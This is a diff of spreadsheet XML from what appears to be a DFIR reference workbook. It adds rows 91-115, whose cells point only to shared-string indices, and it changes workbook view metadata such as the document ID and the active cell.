       <c r="F90" s="1"/>
-      <c r="G90" s="1" t="s">
-        <v>2</v>
-      </c>
+      <c r="G90" s="1"/>
+    </row>
+    <row r="91" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A91" s="1" t="s">
+        <v>192</v>
+      </c>
+      <c r="B91" s="1"/>
+      <c r="C91" s="1"/>
+      <c r="D91" s="1" t="s">
+        <v>257</v>
+      </c>
+      <c r="E91" s="1" t="s">
+        <v>232</v>
+      </c>
+      <c r="F91" s="1"/>
+      <c r="G91" s="1"/>
+    </row>
+    <row r="92" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A92" s="1" t="s">
+        <v>193</v>
+      </c>
+      <c r="B92" s="1"/>
+      <c r="C92" s="1"/>
+      <c r="D92" s="1" t="s">
+        <v>257</v>
+      </c>
+      <c r="E92" s="1" t="s">
+        <v>233</v>
+      </c>
+      <c r="F92" s="1"/>
+      <c r="G92" s="1"/>
+    </row>
+    <row r="93" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A93" s="1" t="s">
+        <v>194</v>
+      </c>
+      <c r="B93" s="1"/>
+      <c r="C93" s="1"/>
+      <c r="D93" s="1" t="s">
+        <v>257</v>
+      </c>
+      <c r="E93" s="1" t="s">
+        <v>234</v>
+      </c>
+      <c r="F93" s="1"/>
+      <c r="G93" s="1"/>
+    </row>
+    <row r="94" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A94" s="1" t="s">
+        <v>195</v>
+      </c>
+      <c r="B94" s="1"/>
+      <c r="C94" s="1"/>
+      <c r="D94" s="1" t="s">
+        <v>257</v>
+      </c>
+      <c r="E94" s="1" t="s">
+        <v>235</v>
+      </c>
+      <c r="F94" s="1"/>
+      <c r="G94" s="1"/>
+    </row>
+    <row r="95" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A95" s="1" t="s">
+        <v>196</v>
+      </c>
+      <c r="B95" s="1"/>
+      <c r="C95" s="1"/>
+      <c r="D95" s="1" t="s">
+        <v>257</v>
+      </c>
+      <c r="E95" s="2" t="s">
+        <v>236</v>
+      </c>
+      <c r="F95" s="1"/>
+      <c r="G95" s="1"/>
+    </row>
+    <row r="96" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A96" s="1" t="s">
+        <v>197</v>
+      </c>
+      <c r="B96" s="1"/>
+      <c r="C96" s="1"/>
+      <c r="D96" s="1" t="s">
+        <v>257</v>
+      </c>
+      <c r="E96" s="1" t="s">
+        <v>237</v>
+      </c>
+      <c r="F96" s="1"/>
+      <c r="G96" s="1"/>
+    </row>
+    <row r="97" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A97" s="1" t="s">
+        <v>198</v>
+      </c>
+      <c r="B97" s="1"/>
+      <c r="C97" s="1"/>
+      <c r="D97" s="1" t="s">
+        <v>257</v>
+      </c>
+      <c r="E97" s="1" t="s">
+        <v>238</v>
+      </c>
+      <c r="F97" s="1"/>
+      <c r="G97" s="1"/>
+    </row>
+    <row r="98" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A98" s="1" t="s">
+        <v>199</v>
+      </c>
+      <c r="B98" s="1"/>
+      <c r="C98" s="1"/>
+      <c r="D98" s="1" t="s">
+        <v>257</v>
+      </c>
+      <c r="E98" s="1" t="s">
+        <v>239</v>
+      </c>
+      <c r="F98" s="1"/>
+      <c r="G98" s="1"/>
+    </row>
+    <row r="99" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A99" s="1" t="s">
+        <v>200</v>
+      </c>
+      <c r="B99" s="1"/>
+      <c r="C99" s="1"/>
+      <c r="D99" s="1" t="s">
+        <v>257</v>
+      </c>
+      <c r="E99" s="1" t="s">
+        <v>240</v>
+      </c>
+      <c r="F99" s="1"/>
+      <c r="G99" s="1"/>
+    </row>
+    <row r="100" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A100" s="1" t="s">
+        <v>201</v>
+      </c>
+      <c r="B100" s="1"/>
+      <c r="C100" s="1"/>
+      <c r="D100" s="1" t="s">
+        <v>257</v>
+      </c>
+      <c r="E100" s="1" t="s">
+        <v>241</v>
+      </c>
+      <c r="F100" s="1"/>
+      <c r="G100" s="1"/>
+    </row>
+    <row r="101" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A101" s="1" t="s">
+        <v>202</v>
+      </c>
+      <c r="B101" s="1"/>
+      <c r="C101" s="1"/>
+      <c r="D101" s="1" t="s">
+        <v>257</v>
+      </c>
+      <c r="E101" s="1" t="s">
+        <v>242</v>
+      </c>
+      <c r="F101" s="1"/>
+      <c r="G101" s="1"/>
+    </row>
+    <row r="102" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A102" s="1" t="s">
+        <v>203</v>
+      </c>
+      <c r="B102" s="1"/>
+      <c r="C102" s="1"/>
+      <c r="D102" s="1" t="s">
+        <v>257</v>
+      </c>
+      <c r="E102" s="1" t="s">
+        <v>243</v>
+      </c>
+      <c r="F102" s="1"/>
+      <c r="G102" s="1"/>
+    </row>
+    <row r="103" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A103" s="1" t="s">
+        <v>204</v>
+      </c>
+      <c r="B103" s="1"/>
+      <c r="C103" s="1"/>
+      <c r="D103" s="1" t="s">
+        <v>257</v>
+      </c>
+      <c r="E103" s="1" t="s">
+        <v>244</v>
+      </c>
+      <c r="F103" s="1"/>
+      <c r="G103" s="1"/>
+    </row>
+    <row r="104" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A104" s="1" t="s">
+        <v>205</v>
+      </c>
+      <c r="B104" s="1"/>
+      <c r="C104" s="1"/>
+      <c r="D104" s="1" t="s">
+        <v>257</v>
+      </c>
+      <c r="E104" s="1" t="s">
+        <v>245</v>
+      </c>
+      <c r="F104" s="1"/>
+      <c r="G104" s="1"/>
+    </row>
+    <row r="105" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A105" s="1" t="s">
+        <v>206</v>
+      </c>
+      <c r="B105" s="1"/>
+      <c r="C105" s="1"/>
+      <c r="D105" s="1" t="s">
+        <v>257</v>
+      </c>
+      <c r="E105" s="1" t="s">
+        <v>246</v>
+      </c>
+      <c r="F105" s="1"/>
+      <c r="G105" s="1"/>
+    </row>
+    <row r="106" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A106" s="1" t="s">
+        <v>207</v>
+      </c>
+      <c r="B106" s="1"/>
+      <c r="C106" s="1"/>
+      <c r="D106" s="1" t="s">
+        <v>257</v>
+      </c>
+      <c r="E106" s="1" t="s">
+        <v>247</v>
+      </c>
+      <c r="F106" s="1"/>
+      <c r="G106" s="1"/>
+    </row>
+    <row r="107" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A107" s="1" t="s">
+        <v>208</v>
+      </c>
+      <c r="B107" s="1"/>
+      <c r="C107" s="1"/>
+      <c r="D107" s="1" t="s">
+        <v>257</v>
+      </c>
+      <c r="E107" s="1" t="s">
+        <v>248</v>
+      </c>
+      <c r="F107" s="1"/>
+      <c r="G107" s="1"/>
+    </row>
+    <row r="108" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A108" s="1" t="s">
+        <v>209</v>
+      </c>
+      <c r="B108" s="1"/>
+      <c r="C108" s="1"/>
+      <c r="D108" s="1" t="s">
+        <v>257</v>
+      </c>
+      <c r="E108" s="1" t="s">
+        <v>249</v>
+      </c>
+      <c r="F108" s="1"/>
+      <c r="G108" s="1"/>
+    </row>
+    <row r="109" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A109" s="1" t="s">
+        <v>210</v>
+      </c>
+      <c r="B109" s="1"/>
+      <c r="C109" s="1"/>
+      <c r="D109" s="1" t="s">
+        <v>257</v>
+      </c>
+      <c r="E109" s="1" t="s">
+        <v>250</v>
+      </c>
+      <c r="F109" s="1"/>
+      <c r="G109" s="1"/>
+    </row>
+    <row r="110" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A110" s="1" t="s">
+        <v>211</v>
+      </c>
+      <c r="B110" s="1"/>
+      <c r="C110" s="1"/>
+      <c r="D110" s="1" t="s">
+        <v>257</v>
+      </c>
+      <c r="E110" s="1" t="s">
+        <v>251</v>
+      </c>
+      <c r="F110" s="1"/>
+      <c r="G110" s="1"/>
+    </row>
+    <row r="111" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A111" s="1" t="s">
+        <v>212</v>
+      </c>
+      <c r="B111" s="1"/>
+      <c r="C111" s="1"/>
+      <c r="D111" s="1" t="s">
+        <v>257</v>
+      </c>
+      <c r="E111" s="1" t="s">
+        <v>252</v>
+      </c>
+      <c r="F111" s="1"/>
+      <c r="G111" s="1"/>
+    </row>
+    <row r="112" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A112" s="1" t="s">
+        <v>213</v>
+      </c>
+      <c r="B112" s="1"/>
+      <c r="C112" s="1"/>
+      <c r="D112" s="1" t="s">
+        <v>257</v>
+      </c>
+      <c r="E112" s="1" t="s">
+        <v>253</v>
+      </c>
+      <c r="F112" s="1"/>
+      <c r="G112" s="1"/>
+    </row>
+    <row r="113" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A113" s="1" t="s">
+        <v>214</v>
+      </c>
+      <c r="B113" s="1"/>
+      <c r="C113" s="1"/>
+      <c r="D113" s="1" t="s">
+        <v>257</v>
+      </c>
+      <c r="E113" s="1" t="s">
+        <v>254</v>
+      </c>
+      <c r="F113" s="1"/>
+      <c r="G113" s="1"/>
+    </row>
+    <row r="114" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A114" s="1" t="s">
+        <v>215</v>
+      </c>
+      <c r="B114" s="1"/>
+      <c r="C114" s="1"/>
+      <c r="D114" s="1" t="s">
+        <v>257</v>
+      </c>
+      <c r="E114" s="1" t="s">
+        <v>255</v>
+      </c>
+      <c r="F114" s="1"/>
+      <c r="G114" s="1"/>
+    </row>
+    <row r="115" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A115" s="1" t="s">
+        <v>216</v>
+      </c>
+      <c r="B115" s="1"/>
+      <c r="C115" s="1"/>
+      <c r="D115" s="1" t="s">
+        <v>257</v>
+      </c>
+      <c r="E115" s="1" t="s">
+        <v>256</v>
+      </c>
+      <c r="F115" s="1"/>
+      <c r="G115" s="1"/>
     </row>
   </sheetData>
   <phoneticPr fontId="1" type="noConversion"/>

--- a/delta2/lib_e/dfir_osir/dfir_20250224.xlsx
+++ b/delta2/lib_e/dfir_osir/dfir_20250224.xlsx
@@ -8,7 +8,7 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/h2w-delta/delta2/lib_e/dfir_osir/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{BD80D512-49F7-4E4C-BFF5-39AF2960BCFA}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{93D80272-D31F-4A47-AED1-F3346D4029C3}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
     <workbookView xWindow="0" yWindow="-21100" windowWidth="38080" windowHeight="20780" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
   </bookViews>
@@ -1242,8 +1242,8 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{CADA5849-2682-F643-8842-EFF560F6FB5C}">
   <dimension ref="A1:G115"/>
   <sheetViews>
-    <sheetView tabSelected="1" topLeftCell="A28" workbookViewId="0">
-      <selection activeCell="E51" sqref="E51"/>
+    <sheetView tabSelected="1" topLeftCell="A4" workbookViewId="0">
+      <selection activeCell="E14" sqref="E14"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
